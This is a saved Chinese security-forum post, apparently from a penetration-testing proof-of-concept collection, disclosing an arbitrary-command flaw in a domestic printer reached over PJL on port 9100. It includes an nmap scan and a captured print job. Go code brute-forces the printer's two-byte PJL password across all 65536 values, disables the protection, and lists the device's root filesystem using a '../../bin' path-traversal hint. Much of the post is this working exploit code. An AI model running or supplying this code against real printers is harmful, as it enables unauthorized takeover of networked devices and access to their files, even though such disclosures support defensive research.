Penetration_Testing_POC/books/信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns=http://www.w3.org/1999/xhtml style><!--
 Page saved with SingleFile 
 url: https://www.t00ls.com/thread-73632-1-1.html 
--><meta charset=utf-8>
<title>信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞 - 原创文章发布(Original Article) - T00ls | 低调求发展 - 潜心习安全</title>
<meta name=keywords content="T00ls.Com - 低调求发展 - 潜心习安全 - Focus On Cyber Security">
<meta name=description content=" T00ls 1.漏洞名称打印机9100 端口开启且 PJL 保护机制密钥易被暴力破解时，攻击者可发送 PJL 指令获取完全访问权限，进而执行任意命令。2.漏洞描述打印机 PJL 任意 ... - Discuz! Board">
<meta name=generator content="Discuz! 1.0">
<meta name=author content="Discuz! Team and Comsenz UI Team">
<meta name=copyright content="2001-2009 Comsenz Inc.">
<meta name=MSSmartTagsPreventParsing content=True>
<meta http-equiv=MSThemeCompatible content=Yes>
<meta http-equiv=X-UA-Compatible content="IE=9">
<link rel=archives title=T00ls href=https://www.t00ls.com/archiver/>
<style>*{word-wrap:break-word}html,body{border:0!important}body{background:#EEEEEE;text-align:center}body,td{color:#444;font:12px/1.6em Verdana,Helvetica,Arial,sans-serif}body,ul,li,p,h1,h2{margin:0;padding:0}ul li{list-style:none}a{text-decoration:none}a:hover{text-decoration:underline}table{empty-cells:show;border-collapse:collapse}.s_clear:after{content:".";display:block;height:0;clear:both;visibility:hidden}.s_clear{zoom:1}.wrap{text-align:left;margin:0 auto}#wrap{padding-bottom:10px;min-height:450px;border:5px solid #333333;background-color:#FFF;clear:both}.wrap{width:98%}.mainbox table{width:100%}@keyframes myanimation{0%{color:white}25%{color:yellow}50%{color:green}75%{color:brown}100%{color:red}}#wrap{border-bottom:5px solid}</style><style>.threadfix{padding-bottom:0!important;min-height:300px!important}.viewthread table{table-layout:fixed}.viewthread td.postcontent{vertical-align:top;border:none;overflow:hidden}.viewthread td.postcontent{padding:0 15px}.postmessage{clear:left}.postmessage *{line-height:normal}.postmessage h1,.postmessage h2{margin:8px 0;font-size:1.17em}.postmessage h1 a{font-weight:400;color:#444}#threadtitle{margin-bottom:8px;border-bottom:1px dashed #999}.defaultpost{padding-bottom:1em}.t_msgfont{font-size:14px;line-height:1.6em}.t_msgfont *{line-height:normal}.t_msgfont ul{margin-left:14px}.t_msgfont li{margin-left:2em}.t_msgfont ul li{list-style-type:disc}.t_attach{border:1px solid #999;background:#FFF;font-size:12px;padding:5px}.t_attach{width:130px}.t_msgfontfix table{margin-left:1px}.t_msgfontfix{min-height:100px}</style>
<style>.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;color:#24292e;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none}.markdown-body *{box-sizing:border-box}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body p,.markdown-body ul,.markdown-body ol{margin-top:0;margin-bottom:16px}.markdown-body h2{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid #eaecef}.markdown-body ul,.markdown-body ol{padding-left:2em}.markdown-body li+li{margin-top:0.25em}.markdown-body img{box-sizing:content-box;background-color:#fff}</style>
<style>.hljs{display:block;overflow-x:auto;padding:0.5em;background:#23241f!important;white-space:pre-wrap;word-wrap:break-word}.hljs{color:#f8f8f2!important}.hljs-number{color:#ae81ff}.hljs-string{color:#e6db74}.hljs-meta{color:#75715e}</style>
<style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}@media screen and (max-width:768px){}@keyframes image-loading-rotate{from{transform:rotate(360deg)}to{transform:rotate(0deg)}}</style><meta name=referrer content=no-referrer><link type=image/x-icon rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA9PT3/fX19/319ff99fX3/fX19/319ff96enr/cXFx/319ff99fX3/fX19/319ff99fX3/fX19/319ff89PT3/fX19////////////////////////////rq6u/xYWFv/b29v/////////////////////////////////fX19/319ff///////////////////////////8vLy/8BAQH/RUVF//39/f///////////////////////////319ff99fX3////////////////////////////8/Pz/NjY2/wgICP/t7e3///////////////////////////99fX3/fX19/////////////////////////////////7i4uP8AAAD/pqam////////////////////////////fX19/319ff/////////////////////////////////+/v7/TU1N/yMjI//4+Pj//////////////////////319ff99fX3//////////////////////////////////////9/f3/8QEBD/jIyM//////////////////////99fX3/fX19////////////////////////////////////////////m5ub/xEREf/l5eX/////////////////fX19/319ff////////////////////////////////////////////////9TU1P/W1tb/////////////////319ff99fX3//////8/Pz/8uLi7/kZGR/+vr6///////////////////////7Ozs/yMjI/+0tLT///////////99fX3/fX19///////X19f/AQEB/xMTE/9gYGD/pKSk/9jY2P/09PT//v7+///////MzMz/HR0d/+jo6P//////fX19/319ff//////+/v7/ysrK/8AAAD/AAAA/wAAAP8AAAD/DAwM/x0dHf8qKir/Hx8f/wMDA/+2trb//////319ff99fX3////////////Q0ND/Ly8v/wEBAf8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8PDw//8vLy//////99fX3/fX19//////////////////z8/P/U1NT/np6e/3Z2dv9aWlr/SEhI/0ZGRv9cXFz/srKy////////////fX19/319ff///////////////////////////////////////////////////////////////////////////319ff89PT3/fX19/319ff99fX3/fX19/319ff99fX3/fX19/319ff99fX3/fX19/319ff99fX3/fX19/319ff89PT3/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="><style>.sf-hidden{display:none!important}</style><link rel=canonical href=https://www.t00ls.com/thread-73632-1-1.html><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"></head>
<body id=viewthread>
<div id=append_parent style=display:none!important></div><div id=ajaxwaitid style=display:none!important></div>
<div id=header style=display:none!important>
</div>
 
 
<div id=nav style=display:none!important>
 » » 信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞</div>
<div id=ad_text style=display:none!important></div>
<div id=wrap class="wrap s_clear threadfix">
<div class=forumcontrol style=display:none!important>
</div>
<div id=postlist class="mainbox viewthread"><div id=post_1216668><table id=pid1216668 summary=pid1216668 cellspacing=0 cellpadding=0>
<tbody><tr>
<td class=postauthor rowspan=2 style=display:none!important>
 
</td>
<td class=postcontent>
<div id=threadstamp style=display:none!important></div><div class=postinfo style=display:none!important>
</div>
<div class=defaultpost>
<div id=ad_thread2_0 style=display:none!important></div><div id=ad_thread3_0 style=display:none!important></div><div id=ad_thread4_0 style=display:none!important></div>
<div class="postmessage firstpost">
<div id=threadtitle>
<em style=display:none!important>所需阅读权限 10</em><h1><a href="https://www.t00ls.com/forumdisplay.php?fid=52&amp;filter=type&amp;typeid=1">[【原创】]</a> 信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞</h1>
</div>
<div class=t_msgfontfix>
<table cellspacing=0 cellpadding=0><tbody><tr><td class=t_msgfont id=postmessage_1216668><div class=markdown-body><h2>1.漏洞名称</h2>
<p>打印机9100 端口开启且 PJL 保护机制密钥易被暴力破解时，攻击者可发送 PJL 指令获取完全访问权限，进而执行任意命令。</p>
<h2>2.漏洞描述</h2>
<p>打印机 PJL 任意命令执行漏洞中，打印机 9100 端口开启，攻击者可向其发送 PJL 指令请求设备名称。因 PJL 保护机制密钥仅由 2 字节存储，能被暴力破解，攻击者借此可获取完全访问权限，进而肆意执行任意命令 。</p>
<h2>3. 漏洞分析</h2>
<ul>
<li>端口扫描 - 例子</li>
</ul>
<pre><code class="language-shell hljs"><span class=hljs-meta>$</span><span class=bash> nmap -Pn 192.168.1.1 </span>
Starting Nmap 7.94 ( https://nmap.org ) at 2025-05-22 14:30 CST
Nmap scan results for printer-ip (192.168.1.100)
Host is up (0.042s latency).
PORT     STATE SERVICE
9100/tcp open  lpd
| lpd-version:
|   SERVER: HP LaserJet Pro MFP M428fdw
|_  VERSION: HP PJL 5.0 (PostScript Level 3)
MAC Address: XX:XX:XX:XX:XX:XX (HP Inc.)</code></pre>
<ul>
<li>分析报文</li>
</ul>
<p>在默认 Windows 系统中，可通过添加打印机功能输入 IP 地址连接网络打印机，并打印测试页。此时使用 Wireshark 抓取网络接口数据，可分析终端与打印机之间交互的通信报文，如协议类型、数据传输内容等细节。</p>
<p>
<span style=position:absolute;display:none id=attach_170632></span>
<img src="data:image/png;base64,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
<div class=t_attach id=aimg_170632_menu style=position:absolute;z-index:301;opacity:1;left:203.07px;top:924.586px;display:none> 
 (115.62 KB)
</div>
<p></p>
<p>报文数据内容如下:</p>
<pre><code class="language-js hljs javascript">.print
.<span class=hljs-number>.88</span> cfA018DESKTOP<span class=hljs-number>-10E6</span>T52
.HDESKTOP<span class=hljs-number>-10E6</span>T52
Ptest
Jnew <span class=hljs-number>2</span>
ldfA018DESKTOP<span class=hljs-number>-10E6</span>T52
UdfA018DESKTOP<span class=hljs-number>-10E6</span>T52
Nnew <span class=hljs-number>2</span>
..<span class=hljs-number>.125899906843000</span> dfA018DESKTOP<span class=hljs-number>-10E6</span>T52
..%<span class=hljs-number>-12345</span>X@PJL COMMENT HanGuang BMF <span class=hljs-number>6000</span> Series PCL6 <span class=hljs-number>1.23</span><span class=hljs-number>.1</span><span class=hljs-number>.7</span>              
@PJL JOB DISPLAY=<span class=hljs-string>"new 2"</span>
@PJL JOB NAME=<span class=hljs-string>"new 2"</span>
@PJL SET JOBATTR=<span class=hljs-string>"DocumentName=new 2"</span>
@PJL SET JOBATTR=<span class=hljs-string>"ComputerName=DESKTOP-10E6T52"</span>
@PJL SET JOBATTR=<span class=hljs-string>"UserName=xxxx"</span>
@PJL SET JOBATTR=<span class=hljs-string>"ReceptionTime=16:29:28 2021/10/27"</span>
@PJL SET PAPER=A4
@PJL SET ROTATESORT=OFF
@PJL SET ORIENTATION=PORTRAIT
@PJL SET RESOLUTION=<span class=hljs-number>600</span>
@PJL SET MEDIATYPE=AUTOSELECT
@PJL SET STAPLE=OFF
@PJL SET DUPLEX=OFF
@PJL SET HOLD=NORMAL
@PJL SET ECONOMODE=OFF
@PJL SET AUTHENTICATIONUSERID=<span class=hljs-string>""</span>
@PJL SET AUTHENTICATIONPASSWORD=<span class=hljs-string>""</span>
@PJL SET AUTHENTICATIONGROUPID=<span class=hljs-string>""</span>
@PJL SET AUTHENTICATIONGROUPPW=<span class=hljs-string>""</span>
@PJL SET BRIGHTNESS=<span class=hljs-string>"A:0"</span>
@PJL SET CONTRAST=<span class=hljs-string>"A:1"</span>
@PJL SET TONERDARKNESS=<span class=hljs-number>5</span>
@PJL SET QTY=<span class=hljs-number>1</span>
@PJL ENTER LANGUAGE=POSTSCRIPT
) HP-PCL XL;<span class=hljs-number>3</span>;<span class=hljs-number>0</span>;Comment Copyright(c) <span class=hljs-number>1999</span><span class=hljs-number>-2003</span> Microsoft Corporation
.X.X...........A........H...&amp;...(..<span class=hljs-number>.4</span>...Standard.<span class=hljs-string>'...%C.`.`..*u....?...?.+w....j...,{...-x...-|...,{...,{.....y...        c..;.s......B.....        c........MS PCLXLFont 001..O.....P...........
...P.
BR.....X.X.....P........Q....MS PCLXLFont 001......B.......o....?...?..e....MS PCLXLFont 001..R..........S.....        .4. .4............................p.............................................................................................................................................................................................S.............T.;....Lk..................222.......s..Lk...,{...        c....s......B.....s..Lk....s......B.....s..Lk....s.,....B.....,{....        c....MS PCLXLFont 001..R..........S.......0.%.0.................p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p...........................S.......0.'</span><span class=hljs-number>.0</span>..................<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>.........................................................................................................................................................................................S.........<span class=hljs-number>.1</span>.#<span class=hljs-number>.2</span>......?..........................................<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>....&lt;.........................................................?.........................................................................................&gt;.....................T......Lk.................<span class=hljs-number>.222</span>.......<span class=hljs-number>.1</span>D....MS PCLXLFont <span class=hljs-number>001.</span>.UIB.%<span class=hljs-number>-12345</span>X@PJL EOJ
.%<span class=hljs-number>-12345</span>X.</code></pre>
<p>通过分析抓取的通信数据报文可知，打印机接收的打印指令遵循 PJL（Printer Job Language）语法格式，该协议用于在终端与打印机间传输作业控制指令及状态查询等信息。</p>
<ul>
<li>意外情况</li>
</ul>
<p>之前无意开启安全保护模式，导致无法执行PJL命令，经过查阅资料得知，打印机发送PJL指令之前需要对使用者的身份进行认证。后面发现该认证机制存在被爆破风险，由于认证程序的密钥长度为2字节长度，则可通过爆破方式绕过认证，最终任意执行PJL命令。 </p>
<ul>
<li>爆破密码</li>
</ul>
<p>爆破+禁用密码保护</p>
<pre><code class=language-golang>func (c *Cli) CrackPass() {
        for i := 0; i &lt; 65536; i++ {
                PjlPass := fmt.Sprintf("JOB PASSWORD=%d\r\n", i)
                CrackPassInfo := START + PjlPass + END
                log.Println(CrackPassInfo)
                data := []byte(CrackPassInfo)
                c.conn.Write(data)
                //禁用密码保护
                PjlDefaultPass := "DEFAULT PASSWORD=0\r\n"
                DefaultPassInfo := START + PjlDefaultPass + END
                log.Println(DefaultPassInfo)
                data = []byte(DefaultPassInfo)
                c.conn.Write(data)
        }
}</code></pre>
<p>如何设置密码？</p>
<pre><code class=language-golang>func (c *Cli) SetPassWord() {
        log.Println("Start to Set Password!")
        InfoId := "@PJL DEFAULT PASSWORD=61220\r\n"
        DeviceId := START + InfoId + END

        data := []byte(DeviceId)

        c.conn.Write(data)

        rsp, err := ioutil.ReadAll(c.conn)
        if err != nil {
                fmt.Println(err.Error())
                return
        }

        fmt.Println(string(rsp))
}
</code></pre>
<h2>4. 漏洞复现</h2>
<ul>
<li>获取打印机系统根目录</li>
</ul>
<pre><code class=language-golang>const START = "\033%-12345X@PJL "
const END = "\033%-12345X\r\n"

func (c *Cli) ListDirectory(path string) {
        // ../../bin
        log.Println("Start to Query Printer Directory!")
        InfoId := fmt.Sprintf("@PJL FSDIRLIST NAME=\"%s\" ENTRY=1 COUNT=1024\r\n", path)
        DeviceId := START + InfoId + END

        data := []byte(DeviceId)

        c.conn.Write(data)

        rsp, err := ioutil.ReadAll(c.conn)
        if err != nil {
                log.Println("Error:", err.Error())
                return
        }

        log.Println("Printer Response: " + string(rsp))
}</code></pre>
<ul>
<li>报文响应</li>
</ul>
<ol>
<li>打印机字符串</li>
<li>获取设备ID</li>
<li>获取设备根文件系统目录</li>
</ol>
<p>
<span style=position:absolute;display:none id=attach_170631></span>
<img src="data:image/png;base64,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